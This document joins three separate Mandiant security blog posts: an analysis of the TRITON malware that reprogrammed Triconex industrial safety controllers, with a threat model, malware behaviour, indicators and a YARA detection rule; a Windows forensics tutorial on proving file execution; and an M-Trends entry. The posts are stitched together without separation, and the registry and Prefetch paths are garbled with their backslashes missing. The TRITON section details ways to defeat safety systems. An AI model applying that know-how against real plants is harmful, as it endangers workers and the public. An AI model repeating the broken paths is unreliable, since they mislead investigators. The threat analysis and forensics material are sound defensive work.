Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems. The targeted systems provided emergency shutdown capability for industrial processes. We assess with moderate confidence that the attacker was developing the capability to cause physical damage and inadvertently shutdown operations. This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack.

TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016. TRITON is consistent with these attacks, in that it could prevent safety mechanisms from executing their intended function, resulting in a physical consequence.

Malware Family

Main Modules




Main executable leveraging

Custom communication library for interaction with Triconex controllers.

Table 1: Description of TRITON Malware

Incident Summary

The attacker gained remote access to an SIS engineering workstation and deployed the TRITON attack framework to reprogram the SIS controllers. During the incident, some SIS controllers entered a failed safe state, which automatically shutdown the industrial process and prompted the asset owner to initiate an investigation. The investigation found that the SIS controllers initiated a safe shutdown when application code between redundant processing units failed a validation check -- resulting in an MP diagnostic failure message.

We assess with moderate confidence that the attacker inadvertently shutdown operations while developing the ability to cause physical damage for the following reasons:

  • Modifying the SIS could prevent it from functioning correctly, increasing the likelihood of a failure that would result in physical consequences.
  • TRITON was used to modify application memory on SIS controllers in the environment, which could have led to a failed validation check.
  • The failure occurred during the time period when TRITON was used.
  • It is not likely that existing or external conditions, in isolation, caused a fault during the time of the incident.


FireEye has not connected this activity to any actor we currently track; however, we assess with moderate confidence that the actor is sponsored by a nation state. The targeting of critical infrastructure as well as the attacker’s persistence, lack of any clear monetary goal and the technical resources necessary to create the attack framework suggest a well-resourced nation state actor.  Specifically, the following facts support this assessment:

The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences. This is an attack objective not typically seen from cyber-crime groups.

The attacker deployed TRITON shortly after gaining access to the SIS system, indicating that they had pre-built and tested the tool which would require access to hardware and software that is not widely available. TRITON is also designed to communicate using the proprietary TriStation protocol which is not publicly documented suggesting the adversary independently reverse engineered this protocol.

The targeting of critical infrastructure to disrupt, degrade, or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian, Iranian, North Korean, U.S., and Israeli nation state actors. Intrusions of this nature do not necessarily indicate an immediate intent to disrupt targeted systems, and may be preparation for a contingency.

Background on Process Control and Safety Instrumented Systems

Figure 1: ICS Reference Architecture

Modern industrial process control and automation systems rely on a variety of sophisticated control systems and safety functions. These systems and functions are often referred to as Industrial Control Systems (ICS) or Operational Technology (OT).

A Distributed Control System (DCS) provides human operators with the ability to remotely monitor and control an industrial process. It is a computerized control system consisting of computers, software applications and controllers. An Engineering Workstation is a computer used for configuration, maintenance and diagnostics of the control system applications and other control system equipment.

A SIS is an autonomous control system that independently monitors the status of the process under control. If the process exceeds the parameters that define a hazardous state, the SIS attempts to bring the process back into a safe state or automatically performs a safe shutdown of the process. If the SIS and DCS controls fail, the final line of defense is the design of the industrial facility, which includes mechanical protections on equipment (e.g. rupture discs), physical alarms, emergency response procedures and other mechanisms to mitigate dangerous situations.

Asset owners employ varied approaches to interface their plant's DCS with the SIS. The traditional approach relies on the principles of segregation for both communication infrastructures and control strategies. For at least the past decade, there has been a trend towards integrating DCS and SIS designs for various reasons including lower cost, ease of use, and benefits achieved from exchanging information between the DCS and SIS. We believe TRITON acutely demonstrates the risk associated with integrated designs that allow bi-directional communication between DCS and SIS network hosts.

Safety Instrumented Systems Threat Model and Attack Scenarios

Figure 2: Temporal Relationship Between Cyber Security and Safety

The attack lifecycle for disruptive attacks against ICS is similar to other types of cyber attacks, with a few key distinctions. First, the attacker’s mission is to disrupt an operational process rather than steal data. Second, the attacker must have performed OT reconnaissance and have sufficient specialized engineering knowledge to understand the industrial process being controlled and successfully manipulate it.

Figure 2 represents the relationship between cyber security and safety controls in a process control environment. Even if cyber security measures fail, safety controls are designed to prevent physical damage. To maximize physical impact, a cyber attacker would also need to bypass safety controls.

The SIS threat model below highlights some of the options available to an attacker who has successfully compromised an SIS.

Attack Option 1: Use the SIS to shutdown the process

  • The attacker can reprogram the SIS logic to cause it to trip and shutdown a process that is, in actuality, in a safe state. In other words, trigger a false positive.
  • Implication: Financial losses due to process downtime and complex plant start up procedure after the shutdown.

Attack Option 2: Reprogram the SIS to allow an unsafe state

  • The attacker can reprogram the SIS logic to allow unsafe conditions to persist.
  • Implication: Increased risk that a hazardous situation will cause physical consequences (e.g. impact to equipment, product, environment and human safety) due to a loss of SIS functionality.

Attack Option 3: Reprogram the SIS to allow an unsafe state – while using the DCS to create an unsafe state or hazard

  • The attacker can manipulate the process into an unsafe state from the DCS while preventing the SIS from functioning appropriately.
  • Implication: Impact to human safety, the environment, or damage to equipment, the extent of which depends on the physical constraints of the process and the plant design.

Analysis of Attacker Intent

We assess with moderate confidence that the attacker’s long-term objective was to develop the capability to cause a physical consequence. We base this on the fact that the attacker initially obtained a reliable foothold on the DCS and could have developed the capability to manipulate the process or shutdown the plant, but instead proceeded to compromise the SIS system. Compromising both the DCS and SIS system would enable the attacker to develop and carry out an attack that causes the maximum amount of damage allowed by the physical and mechanical safeguards in place.

Once on the SIS network, the attacker used their pre-built TRITON attack framework to interact with the SIS controllers using the TriStation protocol. The attacker could have caused a process shutdown by issuing a halt command or intentionally uploading flawed code to the SIS controller to cause it to fail. Instead, the attacker made several attempts over a period of time to develop and deliver functioning control logic for the SIS controllers in this target environment. While these attempts appear to have failed due one of the attack scripts’ conditional checks, the attacker persisted with their efforts. This suggests the attacker was intent on causing a specific outcome beyond a process shutdown.

Of note, on several occasions, we have observed evidence of long term intrusions into ICS which were not ultimately used to disrupt or disable operations. For instance, Russian operators, such as Sandworm Team, have compromised Western ICS over a multi-year period without causing a disruption.

Summary of Malware Capabilities

The TRITON attack tool was built with a number of features, including the ability to read and write programs, read and write individual functions and query the state of the SIS controller. However, only some of these capabilities were leveraged in the trilog.exe sample (e.g. the attacker did not leverage all of TRITON’s extensive reconnaissance capabilities).

The TRITON malware contained the capability to communicate with Triconex SIS controllers (e.g. send specific commands such as halt or read its memory content) and remotely reprogram them with an attacker-defined payload. The TRITON sample Mandiant analyzed added an attacker-provided program to the execution table of the Triconex controller. This sample left legitimate programs in place, expecting the controller to continue operating without a fault or exception. If the controller failed, TRITON would attempt to return it to a running state. If the controller did not recover within a defined time window, this sample would overwrite the malicious program with invalid data to cover its tracks.


Asset owners who wish to defend against the capabilities demonstrated in the incident, should consider the following controls:

  • Where technically feasible, segregate safety system networks from process control and information system networks. Engineering workstations capable of programming SIS controllers should not be dual-homed to any other DCS process control or information system network.
  • Leverage hardware features that provide for physical control of the ability to program safety controllers. These usually take the form of switches controlled by a physical key. On Triconex controllers, keys should not be left in the PROGRAM mode other than during scheduled programming events.
  • Implement change management procedures for changes to key position. Audit current key state regularly.
  • Use a unidirectional gateway rather than bidirectional network connections for any applications that depend on the data provided by the SIS.
  • Implement strict access control and application whitelisting on any server or workstation endpoints that can reach the SIS system over TCP/IP.
  • Monitor ICS network traffic for unexpected communication flows and other anomalous activity.

Figure 3: Triconex Key Switch (source)

Appendix: Technical Analysis

Figure 4: TRITON Architecture and Attack Scenario

TRITON was deployed on an SIS engineering workstation running the Microsoft Windows operating system. The malware was named to masquerade as the legitimate Triconex Trilog application. This application is used for reviewing logs and is a part of the TriStation application suite. The malware was delivered as a Py2EXE compiled python script dependent on a zip file containing standard Python libraries, open source libraries, as well as the attacker-developed Triconex attack framework for interacting with the Triconex controllers. Along with the executable, two binary files, inject.bin (malicious function code) and imain.bin (malicious control logic), were deployed as the controller’s payload. These file names were hard coded in the Py2EXE compiled python script.

Trilog.exe took one option from the command line, which was a single IP address of the target Triconex device. It did not leverage the underlying TRITON library’s capability for Triconex device discovery, instead an instance of trilog.exe had to be invoked separately for each target controller in the environment. Once invoked, trilog.exe checked the status of the controller, then read the configuration information exposed by the TriStation protocol. If the controller was in a running state, trilog.exe encoded the two payload files inject.bin and imain.bin and passed them to the communication libraries to be appended to the controller’s program memory and execution table.

After payload files were inserted into memory on the Triconex controller, the script initiated a countdown, periodically checking the status of the controller. If an error was detected, the communication library’s method SafeAppendProgramMod attempted to reset the controller to the previous state using a TriStation protocol command. If this failed, trilog.exe attempted to write a small ‘dummy’ program to memory. We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller.

Working with the asset owner, Mandiant ran trilog.exe in a lab environment with a valid Triconex controller and discovered a conditional check in the malware that prevented the payload binary from persisting in the environment. Mandiant confirmed that, after correcting patching the attack script to remove this check, the payload binary would persist in controller memory, and the controller would continue to run.

TRITON implements the TriStation protocol, which is the protocol used by the legitimate TriStation application, to configure controllers.

TsHi is the high-level interface created by the malware’s authors that allows the threat actor’s operators to implement attack scripts using the TRITON framework. It exposes functions for both reconnaissance and attack. The functions generally accept binary data from the user, and handle the code ‘signing’ and check sums prior to passing the data to lower level libraries for serialization on to the network.

TsBase, another attacker-written module, contains the functions called by TsHi, which translate the attacker’s intended action to the appropriate TriStation protocol function code. For certain functions, it also packs and pads the data in to the appropriate format.

TsLow is an additional attacker module that implements the TriStation UDP wire protocol. The TsBase library primarily depends on the ts_exec method. This method takes the function code and expected response code, and serializes the commands payload over UDP. It checks the response from the controller against the expected value and returns a result data structure indicating success or a False object representing failure.

TsLow also exposes the connect method used to check connectivity to the target controller. If invoked with no targets, it runs the device discovery function detect_ip. This leverages a "ping" message over the TriStation protocol using IP broadcast to find controllers that are reachable via a router from where the script is invoked.





MD5: 6c39c3f4a08d3d78f2eb973a94bd7718


MD5: 437f135ba179959a580412e564d3107f


MD5: 0544d425c7555dc4e9d76b571f31f500

MD5: 0face841f7b2953e7c29c064d6886523


MD5: e98f4f3505f05bf90e17554fbc97bba9


MD5: 288166952f934146be172f6353e9a1f5


MD5: 27c69aa39024d21ea109cc9c9d944a04


MD5: f6b3a73c8c87506acda430671360ce15


MD5: 8b675db417cc8b23f4c43f3de5c83438


          author = "nicholas.carr @itsreallynick"
          md5 = "0face841f7b2953e7c29c064d6886523"
          description = "TRITON framework recovered during Mandiant ICS incident response"
          $python_compiled = ".pyc" nocase ascii wide
          $python_module_01 = "__module__" nocase ascii wide
          $python_module_02 = "<module>" nocase ascii wide
          $python_script_01 = "import Ts" nocase ascii wide
          $python_script_02 = "def ts_" nocase ascii wide  

          $py_cnames_01 = "" nocase ascii wide
          $py_cnames_02 = "TRICON" nocase ascii wide
          $py_cnames_03 = "TriStation " nocase ascii wide
          $py_cnames_04 = " chassis " nocase ascii wide  

          $py_tslibs_01 = "GetCpStatus" nocase ascii wide
          $py_tslibs_02 = "ts_" ascii wide
          $py_tslibs_03 = " sequence" nocase ascii wide
          $py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide
          $py_tslibs_05 = /module\s?version/ nocase ascii wide
          $py_tslibs_06 = "bad " nocase ascii wide
          $py_tslibs_07 = "prog_cnt" nocase ascii wide  

          $py_tsbase_01 = "" nocase ascii wide
          $py_tsbase_02 = ".TsBase(" nocase ascii wide 
          $py_tshi_01 = "" nocase ascii wide
          $py_tshi_02 = "keystate" nocase ascii wide
          $py_tshi_03 = "GetProjectInfo" nocase ascii wide
          $py_tshi_04 = "GetProgramTable" nocase ascii wide
          $py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
          $py_tshi_06 = ".TsHi(" ascii nocase wide  

          $py_tslow_01 = "" nocase ascii wide
          $py_tslow_02 = "print_last_error" ascii nocase wide
          $py_tslow_03 = ".TsLow(" ascii nocase wide
          $py_tslow_04 = "tcm_" ascii wide
          $py_tslow_05 = " TCM found" nocase ascii wide  

          $py_crc_01 = "crc.pyc" nocase ascii wide
          $py_crc_02 = "CRC16_MODBUS" ascii wide
          $py_crc_03 = "Kotov Alaxander" nocase ascii wide
          $py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
          $py_crc_05 = "crc16ret" ascii wide
          $py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
          $py_crc_07 = /CRC16_CCITT[^_]/ ascii wide  

          $py_sh_01 = "sh.pyc" nocase ascii wide  

          $py_keyword_01 = " FAILURE" ascii wide
          $py_keyword_02 = "symbol table" nocase ascii wide  

          $py_TRIDENT_01 = "inject.bin" ascii nocase wide
          $py_TRIDENT_02 = "imain.bin" ascii nocase wide  

          2 of ($python_*) and 7 of ($py_*) and filesize < 3MB

Did It Execute?

You found a malicious executable! Now you've got a crucial question to answer: did the file execute? We'll discuss a few sources of evidence you can use to answer this question. In this post, we will focus on static or "dead drive" forensics on Windows systems. We will cover four main sources of evidence: Windows Prefetch, Registry, Log Files, and File Information.


Windows Prefetch is a good place to begin looking for evidence of file execution. Microsoft designed Windows Prefetch to allow commonly used programs to open faster. By default, it stores information for the last 128 executed files in prefetch files found in "C:WindowsPrefetch". A prefetch file is named as "executable file name" + hash of file path + .pf. The prefetch file stores the first and last run dates, file path, number of times executed, and files loaded within the first ten seconds of process execution. So, if your malware filename / path hash shows up as a prefetch file named "", then you know the file executed. Note: on Windows servers, Prefetch is disabled by default.


As one would expect, the Windows Registry contains vast amounts of information on what goes on behind the scenes in Windows. Since the Registry is so large, the list below is not comprehensive, but it shows the main Registry keys we examine to determine file execution:

1. ShimCache

Microsoft created the ShimCache, or "AppCompatCache" to identify application compatibility issues. The cache data tracks file path, size, last modified time, and last "execution" time (depending on OS). If a file is executed with Windows "createprocess," it is logged in the ShimCache. While a file's presence in the ShimCache does not 100% prove file execution, it does show Windows interacted with the file. The following keys contain ShimCache data: "HKLMSYSTEMCurrentControlSetControlSession ManagerAppCompatibilityAppCompatCache (XP) and "HKLMSYSTEMCurrentControlSetControlSession ManagerAppCompatCacheAppCompatCache" (Non-XP). For more information on the ShimCache, see Andrew Davis' blog entry here - or Mandiant's SANS DFIR conference presentation here.

2. MUICache

When a file is executed via Windows Explorer, the program shell creates an entry in the MUICache. There's a good write up of the process on the Windows Incident Response blog. Windows uses the MUICache to store application names as retrieved from the PE Version Information in its Resource Section. The information is stored in the following keys:

  • "HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache" (XP, 2000, 2003) and
  • "HKCUSoftwareClassesLocal SettingsSoftwareMicrosoftWindowsShellMuiCache" (Vista, 7, 2008).

3. UserAssist

The UserAssist tracks executables and links opened in Explorer. The UserAssist key tracks last execution time and number of times a file was run in the registry key: "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist". Values under the UserAssist key, corresponding to the executable names and file paths, are encrypted with ROT13; as a result, you may miss evidence within this key if you conduct keyword searches prior to decoding. There are a number of tools to decrypt the key, including the RegRipper plugin, found here.

Log Files

There are a few logs you can analyze to determine file execution. Start with the Windows System Event Log, since this log records service starts. The event in Figure 1 shows an Administrator (SID="-500") executed the PSEXECSVC remote execution service:

Figure 1: Event ID 7035 - Service start

When a service starts, it usually executes the file specified in the ImagePath or a loaded service DLL. For example, the "Netman" service uses the legitimate file "netman.dll" when it executes. However, if the ServiceDll in the registry contains a path to a backdoor named "tabcteng.dll", the "Netman" service would execute "tabcteng.dll" instead. Be sure to validate the files in the ImagePath and ServiceDlls for any suspicious service starts.

If Audit Process Tracking is enabled in the Windows Event Log audit settings, the Windows Security Event Log is a wealth of information about processes and can definitively prove file execution. Figure 2 and Figure 3 show the malicious file and associated process ID, as well as the parent process ID and username to aid in further investigation.

Figure 2: XP EventID 592 - Process creation

Windows Vista+ records a similar process creation event, but the EventID is 4688.

Figure 3: Vista+ EventID 4688 - Process creation

Auditing capabilities are more granular with newer versions of Windows and are integrated with Group Policy starting in Windows Server 2008 R2 and Windows 7. Advanced audit policy settings can be found here.

There are too many vendors to cover in this post, but host-based IPS or AV product logs may show when a file is running and/or attempting an action on another file. Figure 4 contains an example event from a McAfee Access Protection log.

Figure 4: McAfee Access Protection log event

The Windows Scheduled Task Log may confirm if the attacker used a scheduled task to execute malware. Scheduled Tasks are recorded in a log file named "SchedLgU.txt" as follows:

Figure 5: Event in Scheduled Task log

In Windows Vista+, the scheduled task executions are also recorded in the log "Microsoft-Windows-TaskScheduler/Operational" event log under Event ID 200 and 201.

Figure 6: Event ID 200 & 201 - Scheduled Task execution

Finally, if an application crashes, the Dr. Watson log may record a malicious task running.

Figure 7: Running tasks captured in Dr. Watson Log

File Functionality

Another way to determine if a file was executed is to look for any output files. When you analyzed the malicious file, was it configured to create data? For example, if the malicious file you found is a keylogger and an associated keylog file is present on the system, the attacker likely executed the file. If the malware was configured to connect to a particular domain name, the browser history may have recorded the associated domain. Table 1 contains an example of two communication mechanisms captured in browser history from the same backdoor.

Table 1: Malicious communication in browser history

To determine if a malicious file executed, analyze the file's functionality, and look for evidence of the resulting activity on disk. Malware functionality can also help you assess an attacker's motivation, end goals, and perhaps reveal additional malicious files.

While this post covered the primary sources of evidence we use to detect file execution, there are many more Registry keys and other Windows files which provide evidence of malware execution, especially in Windows Vista and above. Similarly, information found in system memory can be even more valuable for proving file execution and may provide specific attacker commands and accessed resources. So please, if you find a malicious executable on a running system, be sure to capture the memory before doing anything else. You can capture and analyze memory with Mandiant Redline™.

We will discuss more forensic artifacts in future posts, but feel free to direct message me on Twitter @marycheese.

M-Trends #1: Malware Only Tells Half the Story

When I joined Mandiant earlier this year, I was given the opportunity to help write our annual M-Trends report. This is the third year Mandiant has published the report, which is a summary of the trends we've observed in our investigations over the last twelve months.

I remember reading Mandiant's first M-Trends report when it came out in 2010 and recall being surprised that Mandiant didn't pull any punches. They talked about the advanced persistent threat or APT (they had been using that term for several years...long before it was considered a cool marketing, buzz word), and they were open about the origin of the attacks. The report summarized what I'd been seeing in industry, and offered useful insights for detection and response. Needless to say, I enjoyed the opportunity to work on the latest version.

In this year's report it details six trends we identified in 2011. We developed the six trends for the report very organically. That is, I spent quite a few days and nights reading all of the reports from our outstanding incident response team and wrote about what we saw-we didn't start with trends and then look for evidence to support them.

If you haven't picked up a copy of the report yet, you can do so here. I will be blogging on each of the six trends over the next two weeks; you can even view the videos we've developed for each trend as each blog post is published:

Malware Only Tells Half the Story.

Of the many systems compromised in each investigation, about half of them were never touched by attacker malware.

In so many cases, the intruders logged into systems and took data from them (or used them as a staging point for exfiltration), but didn't install tools. It is ironic that the very systems that hold the data targeted by an attacker are probably the least likely to have malware installed on them. While finding the malware used in an intrusion is important, it is impossible to understand the full scope of an intrusion if this is the focal point of the investigation. We illustrate actual examples of this in the graphical spread on pages 6-7 of the report.

What does this mean for victim organizations?

You could start by looking for malware, but don't end there! A smart incident response process will seek to fully understand the scope of compromise and find all impacted systems in the environment. This could mean finding the registry entries that identify lateral movement, traces of deleted .rar files in unallocated space, or use of a known compromised account. It turns out that Mandiant has a product that does all of this, but the footnote on page 5 is the only mention you'll see in the entire report (and even that was an afterthought).

Thoughts and questions about this trend or the M-Trends report?